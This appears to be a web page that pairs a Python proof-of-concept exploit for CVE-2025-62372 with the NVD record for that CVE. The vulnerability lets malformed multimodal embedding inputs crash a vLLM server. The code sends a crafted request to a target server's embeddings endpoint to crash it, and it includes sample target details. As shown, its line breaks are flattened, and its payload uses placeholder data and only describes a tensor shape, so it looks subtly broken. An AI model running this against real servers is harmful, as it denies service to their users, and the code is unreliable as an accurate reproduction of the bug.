CVE-2025-62372

import requests import json # CVE-2025-62372 PoC - vLLM Multimodal Embedding Crash # Target: vLLM server with multimodal model support def crash_vllm_engine(target_url, model_name): """ PoC to crash vLLM engine by sending malformed multimodal embedding inputs. The input has correct ndim but incorrect shape (wrong hidden dimension). """ # Craft malformed multimodal embedding with correct ndim but wrong shape payload = { "model": model_name, "inputs": { "data": "base64_encoded_multimodal_data", "embedding": { "ndim": 2, # Correct ndim "shape": [1, 512], # Wrong hidden dimension (should be 768 or model expected size) "dtype": "float32" } } } headers = { "Content-Type": "application/json" } # Send malicious request try: response = requests.post( f"{target_url}/v1/embeddings", json=payload, headers=headers, timeout=30 ) print(f"Response status: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed (engine may have crashed): {e}") # Usage # target_url = "http://target-vllm-server:8000" # model_name = "llava-1.5-7b-hf" # crash_vllm_engine(target_url, model_name)

{"cve": {"id": "CVE-2025-62372", "sourceIdentifier": "[email protected]", "published": "2025-11-21T02:15:43.393", "lastModified": "2025-12-04T17:40:47.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, users can crash the vLLM engine serving multimodal models by passing multimodal embedding inputs with correct ndim but incorrect shape (e.g. hidden dimension is wrong), regardless of whether the model is intended to support such inputs (as defined in the Supported Models page). This issue has been patched in version 0.11.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.5.5", "versionEndExcluding": "0.11.1", "matchCriteriaId": "BA1047E1-ED1E-4685-B699-8CE5B2058D87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:*", "matchCriteriaId": "FEE054E1-1F84-4ACC-894C-D7E3652EF1B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "B05850DF-38FE-439F-9F7A-AA96DA9038CC"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/27204", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/vllm-project/vllm/pull/6613", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-pmqf-x6x8-p7qw", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}